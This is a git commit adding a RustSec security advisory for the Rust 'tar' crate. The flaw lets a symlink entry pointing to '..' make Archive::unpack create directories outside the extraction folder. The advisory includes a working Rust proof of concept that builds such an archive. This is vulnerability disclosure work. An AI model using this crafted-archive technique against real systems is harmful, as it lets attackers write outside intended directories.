Add directory traversal for tar (#965)

Co-authored-by: Tony Arcieri <bascule@gmail.com>
2025-12-30 00:03:57 +01:00 · 2021-08-08 19:53:24 +00:00
parent 82ce1aa716
commit 158cd653ca
1 changed files with 57 additions and 0 deletions
--- a/crates/tar/RUSTSEC-0000-0000.md
+++ b/crates/tar/RUSTSEC-0000-0000.md
@@ -0,0 +1,57 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "tar"
+date = "2021-07-19"
+url = "https://github.com/alexcrichton/tar-rs/issues/238"
+
+[versions]
+# none, 0day
+patched = []
+
+[affected]
+functions = { "tar::Archive::unpack" = ["< 1.2.3"] }
+```
+
+# Links in archive can create arbitrary directories
+
+When unpacking a tarball that contains a symlink the `tar` crate may create
+directories outside of the directory it's supposed to unpack into.
+
+The function errors when it's trying to create a file, but the folders are
+already created at this point.
+
+```rust
+use std::{io, io::Result};
+use tar::{Archive, Builder, EntryType, Header};
+
+fn main() -> Result<()> {
+    let mut buf = Vec::new();
+
+    {
+        let mut builder = Builder::new(&mut buf);
+
+        // symlink: parent -> ..
+        let mut header = Header::new_gnu();
+        header.set_path("symlink")?;
+        header.set_link_name("..")?;
+        header.set_entry_type(EntryType::Symlink);
+        header.set_size(0);
+        header.set_cksum();
+        builder.append(&header, io::empty())?;
+
+        // file: symlink/exploit/foo/bar
+        let mut header = Header::new_gnu();
+        header.set_path("symlink/exploit/foo/bar")?;
+        header.set_size(0);
+        header.set_cksum();
+        builder.append(&header, io::empty())?;
+
+        builder.finish()?;
+    };
+
+    Archive::new(&*buf).unpack("demo")
+}
+```
+
+This issue was discovered and reported by Martin Michaelis (@mgjm).